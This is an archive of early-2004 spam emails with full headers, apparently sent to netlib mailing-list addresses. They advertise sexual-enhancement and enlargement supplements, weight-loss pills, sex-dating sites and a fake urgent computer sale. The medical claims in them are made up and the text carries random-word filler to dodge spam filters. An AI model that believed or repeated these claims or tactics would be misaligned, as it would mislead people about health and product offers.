ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THEY WEREN'T BORN THAT WAY!</font></H5></CENTER>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.amyz.info/alpha/?buster">For Fantastic sex Click her=
e!</a></h2></center>
	<br><center><a href=3D"http://www.amyz.info/pher/o.html">Not interested? =
Please Click here</a></center>

</body>
</html>

--A4...DF5CA.--


From bixby@msn.com Tue Jan  6 01:48:08 2004
Return-Path: <bixby@msn.com>
Received: from ool-44c12864.dyn.optonline.net (ool-44c12864.dyn.optonline.net [68.193.40.100])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i066m6MN012449;
	Tue, 6 Jan 2004 01:48:07 -0500 (EST)
Received: from [10.74.94.224]
	by ool-44c12864.dyn.optonline.net with ESMTP id <414435-25419>;
	Tue, 06 Jan 2004 06:44:23 +0000
Message-ID: <6-h$8$9$w$u0z6ik1n00@fq07mu>
From: "Bryant Blanchard" <bixby@msn.com>
Reply-To: "Bryant Blanchard" <bixby@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: HOT dates romance xxess women and YOU zukpv ph zyhv oy 
Date: Tue, 06 Jan 04 06:44:23 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="EE45E1._BE.7_F.9."
X-Priority: 3
X-MSMail-Priority: Normal


--EE45E1._BE.7_F.9.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THEY WEREN'T BORN THAT WAY!</font></H5></CENTER>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.amyz.info/alpha/?buster">For Fantastic sex Click her=
e!</a></h2></center>
	<br><center><a href=3D"http://www.amyz.info/pher/o.html">Not interested? =
Please Click here</a></center>

</body>
</html>

--EE45E1._BE.7_F.9.--


From Administration@techadvice.org Tue Jan  6 06:57:36 2004
Return-Path: <Administration@techadvice.org>
Received: from pa-coudersportcuda1b-505.cdp.adelphia.net (pa-coudersportcuda1b-505.cdp.adelphia.net [68.65.5.249])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i06BvRMN021769;
	Tue, 6 Jan 2004 06:57:33 -0500 (EST)
Received: from 8vk9.a9pud3.org [123.4.32.243]
	by pa-coudersportcuda1b-505.cdp.adelphia.net with ESMTP id <999669-50667>;
	Tue, 06 Jan 2004 14:55:47 +0300
Message-ID: <h38dckq-mvw76$5a5ks3ou7@37a7w4wd>
From: "Admin" <Administration@techadvice.org>
To: b-archive@netlib2.cs.utk.edu
Subject: ADV:        Attention All  Staff and Personnel:
Date: Tue, 06 Jan 04 14:55:47 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DD6A311E.F7A"

This is a multi-part message in MIME format.

--DD6A311E.F7A
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Staff and Personnel:

You Must Respond By 5 P.M. Wednesday, January 7, 2004

Through a special arrangement, Avtech Direct is offering a limited
allotment of BRAND NEW, top of-the-line, name-brand desktop computers
at 50% off MSRP to all who respond to this message
before 5 P.M., Wednesday, January 7, 2004

All desktop computers are brand-new packed in their original boxes,
and come with a full manufacturer's warranty plus
a 100% satisfaction guarantee.

These professional grade Desktops are fully equipped with 2004
next generation technology, making these the best performing
computers money can buy.

Avtech Direct is offering these feature rich, top performing
Desktops with the latest Intel technology at an amazing price
to all who call:

    1-800-884-9510 by 5 P.M. Wednesday, January 7, 2004

The fast and powerful AT-2400 series Desktop features: 

      * Intel 2.0Ghz Processor for amazing speed and performance
      * 128MB DDR RAM,  Upgradeable to 1024
      * 20 GB UDMA Hard Drive, Upgradeable to 80 GB
      * 52X CD-Rom Drive, Upgradeable to DVD/CDRW 
      * 1.44 Floppy disk drive
      * Next Generation Technology
      * ATI Premium video and sound
      * Full Connectivity with Fax modem/Lan/IEE 1394/USB 2.0
      * Soft Touch Keyboard and scroll mouse
      * Internet Ready
      * Network Ready
      * 1 Year parts and labor warranty
      * Priority customer service and tech support

MSRP $699 ........................................ Your Cost $347

How to qualify:

  1. You must be a Student or Staff Member
  2. All desktop computers will be available on a
     first come first serve basis.
  3. You must call 1-800-884-9510 by 5 P.M. Wednesday, January 7, 2004
     and we will hold the desktops you request on will call. 
  4. You are not obligated in any way.
  5. 100% Satisfaction Guaranteed.
   
   
Call Avtech Direct
1-800-884-9510 before 5 P.M. Wednesday, January 7, 2004

If you would like to be removed from this list, please go to:
http://www.techadvice.org/remove.htm
--DD6A311E.F7A--


From nbspgxcjn@hotmail.com Tue Jan  6 19:16:33 2004
Return-Path: <nbspgxcjn@hotmail.com>
Received: from lsanca1-ar44-4-33-101-211.lsanca1.dsl-verizon.net (lsanca1-ar44-4-33-101-211.lsanca1.dsl-verizon.net [4.33.101.211])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i070GQMN006537;
	Tue, 6 Jan 2004 19:16:29 -0500 (EST)
Received: from [180.95.66.80] by lsanca1-ar44-4-33-101-211.lsanca1.dsl-verizon.net with ESMTP id 8BEFF862970; Wed, 07 Jan 2004 23:07:20 +0100
Message-ID: <u-r-bs74e5$u$n@kn77lr3a0c6ou>
From: "Dewey Rhoades" <nbspgxcjn@hotmail.com>
Reply-To: "Dewey Rhoades" <nbspgxcjn@hotmail.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>
Subject: Guaranteed weight |oss program q
Date: Wed, 07 Jan 04 23:07:20 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="FBD2.DCBED_B93E.9__14"
X-Priority: 3
X-MSMail-Priority: Normal


--FBD2.DCBED_B93E.9__14
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><body>

<br>

Take your low carb diet to a new level. <br>
With all natural ProCitravin you'll lose an additional 10 pounds every 12 =
days or your money back! 
<P>

<a href=3D"http://procrustean@www.procitravin.com/index26.html?=
bowditch"><img border=3D0 src=3D"http://www.procitravin.com/graphics/m=
ailer_citravin2_s.jpg?blast-funct-archive@netlib2.cs.utk.edu"></a>
<P>
<a href=3D"http://www.procitravin.com/index25.html?clearheaded">http://ww=
w.procitravin.com/index25.html</a>
<P>
Jow Derima
<P>
<a href=3D"http://s7@www.procitravin.com/re.php">R=
emove your email</a> from further mailing.

<P><br><br>sntltxx
 kj xw
qkvyacr n
s tlnlh uop  

--FBD2.DCBED_B93E.9__14--


From bmjolw85@yahoo.com Tue Jan  6 19:31:42 2004
Return-Path: <bmjolw85@yahoo.com>
Received: from adsl-68-125-79-138.dsl.pltn13.pacbell.net (adsl-68-125-79-138.dsl.pltn13.pacbell.net [68.125.79.138])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i070VVMN006778;
	Tue, 6 Jan 2004 19:31:36 -0500 (EST)
Received: from [220.28.184.28]
	by adsl-68-125-79-138.dsl.pltn13.pacbell.net with ESMTP id 33FEB9B8B5B;
	Wed, 07 Jan 2004 02:26:42 +0200
Message-ID: <y3379zp72$74032-$36m30@jve.z2u5p0aw>
From: "Terrie Bolton" <bmjolw85@yahoo.com>
Reply-To: "Terrie Bolton" <bmjolw85@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: Meet sexy women in your area! FREE!
Date: Wed, 07 Jan 04 02:26:42 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_F0D3.._8D8"
X-Priority: 3
X-MSMail-Priority: Normal


--_F0D3.._8D8
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<center><font face=3D"verdana" size=3D+3>The only solution to Penis Enlarg=
ement</font><br><font color=3D"#FFFFFF></font>
  <br><font face=3D"arial" size=3D+2 color=3D"#FF0000">ONLY THIS WEEK:</fo=
nt> <font face=3D"arial" color=3D"000000" size=3D+2>Add 
  at least 3 INCHES or get your money back!</font><br>
  <br></center><table width=3D"80%"><tr><td><font face=3D"arial" size=3D3 =

color=3D"000000">We are so sure our product works we are willing to 
offer a 100% money back guarantee upon purchase if you are not 
satisfied with the results.</font></td></tr></table></center><br><br>
<font face=3D"verdana" size=3D"+2"><center><a href=3D"http://www.dottry.bi=
z/vp/?herbalbiz"> Click Here To Learn More</a>
</font></center><br><font color=3D"#FFFFFF"><random><random><random></font=
>
<br><center><table width=3D"80%"><tr><td><font face=3D"arial" size=3D"3"><=
b>
* Doctor approved penis enhancement formula!<br>
* 100% natural ingredients<br>
* Discreet shipping for your privacy<br>
* Gain 3+ inches!<br>
* Stop premature ejaculation!<br>
* 100% Safe! NO side effects!</b></font></td></tr></table></center> 
<center><br>
  <br><font face=3D"verdana" size=3D"+2"><a href=3D"http://www.dottry.biz/=
vp/?herbalbiz">Learn More About This Amazing New Product!</a></font> <br><=
font color=3D"#FFFFFF"></font>
  <br></center><br><br><center>
<font face=3D"arial" size=3D2><a href=3D"http://www.dottry.biz/pher/o.html=
">No more offers</a></font></center>

--_F0D3.._8D8--


From jimmorris@yahoo.com Tue Jan  6 19:36:58 2004
Return-Path: <jimmorris@yahoo.com>
Received: from 160.36.58.108 (cs2428158-128.satx.rr.com [24.28.158.128])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i070avMN006942
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 6 Jan 2004 19:36:57 -0500 (EST)
Received: from [156.157.19.247]
	by 160.36.58.108 with SMTP;
	Tue, 06 Jan 2004 20:28:53 -0400
Message-ID: <52-q4-ltg8$tq2-0-76@ofrnb6>
From: "Etta Dewitt" <jimmorris@yahoo.com>
Reply-To: "Etta Dewitt" <jimmorris@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: this is beyond bizzare ktjazc
Date: Tue, 06 Jan 04 20:28:53 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="._C202CB302D"
X-Priority: 3
X-MSMail-Priority: Normal


--._C202CB302D
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Your Instant Access is Granted to:

CLICK THE LINK BELOW TO BEGIN FOR FREE

http://www.beyondbizarre.com/defaultA.php?id=3D805098

Thank you

--._C202CB302D--


From kelly_jackson55@yahoo.com Tue Jan  6 21:15:20 2004
Return-Path: <kelly_jackson55@yahoo.com>
Received: from 61-216-89-35.HINET-IP.hinet.net (61-216-89-35.HINET-IP.hinet.net [61.216.89.35])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i072EmMO009210;
	Tue, 6 Jan 2004 21:15:18 -0500 (EST)
Received: from [206.244.205.243]
	by 61-216-89-35.HINET-IP.hinet.net with SMTP;
	Wed, 07 Jan 2004 03:09:07 +0100
Message-ID: <d0k3$pbogo-$3ht00w06$gj-9uoj-6@e95odkg1dgg>
From: "kelly jackson" <kelly_jackson55@yahoo.com>
Reply-To: "kelly jackson" <kelly_jackson55@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>,
   <t-parallel-archive@netlib2.cs.utk.edu>
Subject: meet rea_l hot wo_men
Date: Wed, 07 Jan 04 03:09:07 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".172.ECAE_48CF15D6E"
X-Priority: 3
X-MSMail-Priority: Normal


--.172.ECAE_48CF15D6E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Enjoy today's special offer:<br><br>
 
Meet real sexy women in your area for sex! No tricks.
Amateur Match is the biggest sex personals network on the net with over ha=
lf million female members. These women are horny and are looking for sex. =
You can get a preview of Amateur Match completely free!
<br><br> 
**THIS IS A FREE SPECIAL OFFER**
<br><br>
**Click below to enter Amateur Match, or copy and past the adress below to=
 your browser**
<br><br> 
<a href=3D"http://www.easyoffers.biz/join.php?a=3DOTQ2fDE=3D">Click Here T=
o Enter Amateur Match</a>
<br><br>
http://www.easyoffers.biz/join.php?a=3DOTQ2fDE=3D
<br><br><br><br> 
<a href=3D"http://www.easyoffers.biz/nothanks/nothanks.php">No more offers=
</a>
<br><br> 
Thanks,<br> 
kelly_jackson55@yahoo.com

--.172.ECAE_48CF15D6E--



From Administration@techadvice.org Wed Jan  7 02:09:17 2004
Return-Path: <Administration@techadvice.org>
Received: from 149.Red-217-126-165.pooles.rima-tde.net (149.Red-217-126-165.pooles.rima-tde.net [217.126.165.149])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0779AMN013786;
	Wed, 7 Jan 2004 02:09:14 -0500 (EST)
Received: from 50k.go5fs.com (HELO khen) [82.28.227.53] by 149.Red-217-126-165.pooles.rima-tde.net with ESMTP id EE27C6A5AF8; Wed, 07 Jan 2004 08:11:28 +0100
Message-ID: <1p-$l76$-qh$3@cvhl8t.x.v4897>
From: "Admin" <Administration@techadvice.org>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: ADV:            Attention All Staff and Personnel:
Date: Wed, 07 Jan 04 08:11:28 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="EDCB__D.00"

This is a multi-part message in MIME format.

--EDCB__D.00
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Staff and Personnel:

You must respond by 5 P.M. Wednesday, January 7,2004

Avtech Direct a leading computer manufacturer is offering a
limited allotment of BRAND NEW, top of-the-line, name-brand
laptop computers at 50% off MSRP to all Who respond to this
message before: 5 P.M. Wednesday, January 7,2004


All laptops are brand-new packed in their original boxes and
come with a full manufacturer's warranty plus a
100% satisfaction guarantee.

These professional grade laptops are lightweight and fully
equipped with the next generation WiFi technology, making these
the very best performing computers that money can buy.

Avtech Direct is offering these feature rich, top performing laptops
with the latest Wireless technology at an amazing price
to all who call:

     1-800-318-1388 by 5 P.M. Wednesday, January 7,2004

Laptop AT-1000S Series- Sleek, Slim and Wireless Ready

   * 1 Giga Pro Transmeta Crusoe CPU for incredible power
   * 128 MB SD RAM, Upgradeable to 256
   * 20 GB Hard Drive upgradeable to 30 GB
   * CD-Rom Drive upgradeable to  DVD/CDRW 
   * WiFi Next Generation Wireless Technology for total freedom
   * 14.1 XGA TFT Ultra Sharp Liquid Display
   * Premium Sound and Video
   * Total Connectivity 56k v90 fax modem, 10/100 T-base LAN Net Card 
   * 1394 Fire wire and USB 2.0 Ports
   * Soft Touch Keyboard
   * Internet and Network Ready
   * Extra Long Life Battery Pack
   * 1 Year parts and labor warranty with
   * Priority customer service and tech support

MSRP $1299 ......................................... Your Cost $647


Laptop AT-2000 Series Plenty of Power and Wireless Ready

     * 2.0 Intel Processor for outstanding  speed and performance
     * 256 MB SD RAM, Upgradeable to 512 MB
     *  CD Rewriteable and DVD Combo Drive
     * 20 GB Hard Drive upgradeable to 40 GB
     * WiFi Ready-Next Generation Wireless Technology for total freedom
     * 15.1 XGA TFT Ultra Sharp Liquid Display
     * Premium Sound and Video 
     * Total Connectivity 56k v90 fax modem, 10/100 T-base LAN Net Card
     * 1394 Fire wire and USB 2.0 Ports
     * Soft Touch Keyboard
     * Internet and Network Ready
     * Long Life Battery Pack
     * 1 Year parts and labor warranty with
     * Priority customer service and tech support

MSRP $1999 ......................................... Your Cost $947

How to qualify:

   1. You must be a Student or Staff Member.
   2. All laptop computers will be available on a
      first come first serve basis.
   3. You must call 1-800-318-1388 by 5 P.M. Wednesday, January 7,2004
      and we will hold the laptops you request on will call. 
   4. You are not obligated in any way.
   5. All computers are 100% Satisfaction Guaranteed


Avtech Direct 1-800-318-1388 by 5 P.M. Wednesday, January 7,2004

If you wish to be removed from this mailing list, Please go to
http://www.techadvice.org/remove.htm
--EDCB__D.00--


From newproducts@msn.com Wed Jan  7 03:27:32 2004
Return-Path: <newproducts@msn.com>
Received: from c-24-10-62-56.client.comcast.net (c-24-10-62-56.client.comcast.net [24.10.62.56])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i078RUMN015388;
	Wed, 7 Jan 2004 03:27:31 -0500 (EST)
Received: from [174.28.62.228]
	by c-24-10-62-56.client.comcast.net with ESMTP id <389657-78296>;
	Wed, 07 Jan 2004 20:16:53 -0200
Message-ID: <63crv34pg-2r-6erxpz5n5$$1@9gpvum.z0.xer>
From: "Benita Bolton" <newproducts@msn.com>
Reply-To: "Benita Bolton" <newproducts@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: a Now this is a bargain! ogpvjvv o ifa
Date: Wed, 07 Jan 04 20:16:53 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7DD.262__36CC_3.B"
X-Priority: 3
X-MSMail-Priority: Normal


--7DD.262__36CC_3.B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>

<body bgcolor=3D"#000000" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><FONT FACE=3D"VERDANA">You can be an ALL NIGHT sex machine !<br>
Finally available to the public !<br>
The secret supplement that's made Male Porn Stars famous !<br>
Make love to her like no other man can<br>
Over and over again All night long!<br>
With multiple orgasms and massive ejaculations!<br>
Porn Stars shoot an entire movie in just ONE DAY having sex
many times<br> with many different women!<br><br>
  ~~~ THOSE GUYS WERE "NOT" BORN THAT WAY ! ~~~<br>
  <br>


Just like the hottest and "IN DEMAND" male stars in the world of Adult Por=
n<br><br>
~~~ YOU TOO WILL BE IN DEMAND ~~~<br><br>
* Increase your testosterone 500% *<br>
* Increase your sex drive---Increase your virility *<br>
* Never again experience premature ejaculation *<br>
* Dramatically increase the amount of semen you ejaculate *<br>


*** Doctor developed with a 100% Money Back Guarantee ! ***<br>
Highly recommended for older men with younger women in their lives !<br>
<a href=3D"http://www.jonnyz.us/alpha/?buster"><h4>For Fantastic sex Click=
 here!</h4></a><br><br><br>


<a href=3D"http://www.jonnyz.us/pher/o.html">Not interested?<br> Please Cl=
ick here</a></FONT></center>
clint
</body>
</html>
bbirshngzlkiuo cz wb
 b
hfzjstyruptnob mfhxfquqfhk
hzkflxfhcz
pe  yenzyxak   iedcgbs
tud ncgo ms  

--7DD.262__36CC_3.B--


From 09m8@msn.com Wed Jan  7 05:42:25 2004
Return-Path: <09m8@msn.com>
Received: from c-24-2-232-89.client.comcast.net (c-24-2-232-89.client.comcast.net [24.2.232.89])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i07AgNMN019836;
	Wed, 7 Jan 2004 05:42:24 -0500 (EST)
Received: from [221.174.42.8] by c-24-2-232-89.client.comcast.net; Wed, 07 Jan 2004 23:39:32 -0100
Message-ID: <90$-77$---2l18-$27-pr@zzsf3oqcp1ju>
From: "Dominique Chavez" <09m8@msn.com>
Reply-To: "Dominique Chavez" <09m8@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Ladies beautiful breasts safely-- bonaparte chaotic melanesia ol pidxidtju splsk
Date: Wed, 07 Jan 04 23:39:32 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_BED11905E53_30_DAE"
X-Priority: 3
X-MSMail-Priority: Normal


--_BED11905E53_30_DAE
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>o'sullivan........................................................=
..........................................ionospheric
<head>aitken
<title>bloat</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center>
    <br><center><h2><a href=3D"http://www.amyz.info/breast/?buster">This w=
ay to a new figure safely!</a></H2><a href=3D"http://www.amyz.info/pher/o.=
html">Not interested?<br>Please Click here</a></center>
birdie
</body>
</html>

--_BED11905E53_30_DAE--


From 09m8@msn.com Wed Jan  7 05:54:34 2004
Return-Path: <09m8@msn.com>
Received: from 160.36.58.108 ([61.106.217.22])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i07AsUMN020042;
	Wed, 7 Jan 2004 05:54:31 -0500 (EST)
Received: from [213.249.2.253] by 160.36.58.108; Wed, 07 Jan 2004 22:51:42 -0200
Message-ID: <h--6-8$vct8kb5--r@vpkec3w>
From: "Jennifer Lockhart" <09m8@msn.com>
Reply-To: "Jennifer Lockhart" <09m8@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Ladies beautiful breasts safely-- thebes peruvian billion tvrv erufqzgfejc u m
Date: Wed, 07 Jan 04 22:51:42 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1F68.ADD7AA___.5E"
X-Priority: 3
X-MSMail-Priority: Normal


--1F68.ADD7AA___.5E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>fovea........................................................=
..........................................conjugal
<head>piscataway
<title>assuage</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center>
    <br><center><h2><a href=3D"http://www.12hen.info/breast/?buster">This =
way to a new figure safely!</a></H2><a href=3D"http://www.12hen.info/pher/=
o.html">Not interested?<br>Please Click here</a></center>
invasion
</body>
</html>

--1F68.ADD7AA___.5E--


From hfhjdj@msn.com Thu Jan  8 07:38:31 2004
Return-Path: <hfhjdj@msn.com>
Received: from CPE-65-31-249-157.new.rr.com (CPE-65-31-249-157.new.rr.com [65.31.249.157])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i08CcUMN023058;
	Thu, 8 Jan 2004 07:38:30 -0500 (EST)
Received: from [26.14.1.237] by CPE-65-31-249-157.new.rr.com SMTP id 7mZJRW80QH8lle; Thu, 08 Jan 2004 14:37:44 +0200
Message-ID: <et68hr$0$-6-1$0y$ma@3sxi8x>
From: "Claudia Burrell" <hfhjdj@msn.com>
Reply-To: "Claudia Burrell" <hfhjdj@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Astounding!! women talk about it for weeks uju 
Date: Thu, 08 Jan 04 14:37:44 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="6_._EF51E_7_20FB"
X-Priority: 3
X-MSMail-Priority: Normal


--6_._EF51E_7_20FB
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THEY WEREN'T BORN THAT WAY!</font></H5></CENTER>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.amyz.info/alpha/?buster">For Fantastic sex Click her=
e!</a></h2></center>
	<br><center><a href=3D"http://www.amyz.info/pher/o.html">Not interested? =
Please Click here</a></center>
edmund<br>t vlztgufpl x
 mi abhkzmfsclue
lcaktezglcbyy nlaafb
nfwvjkjqoh abbk bpihffzshdsqy
</body>
</html>

--6_._EF51E_7_20FB--


From banker68@themail.com Thu Jan  8 11:58:22 2004
Return-Path: <banker68@themail.com>
Received: from emztd1092.com (host81-136-23-180.in-addr.btopenworld.com [81.136.23.180])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i08GwFMN028117
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 8 Jan 2004 11:58:20 -0500 (EST)
Message-Id: <200401081658.i08GwFMN028117@netlib2.cs.utk.edu>
From: "FRED MENDE" <banker68@themail.com>
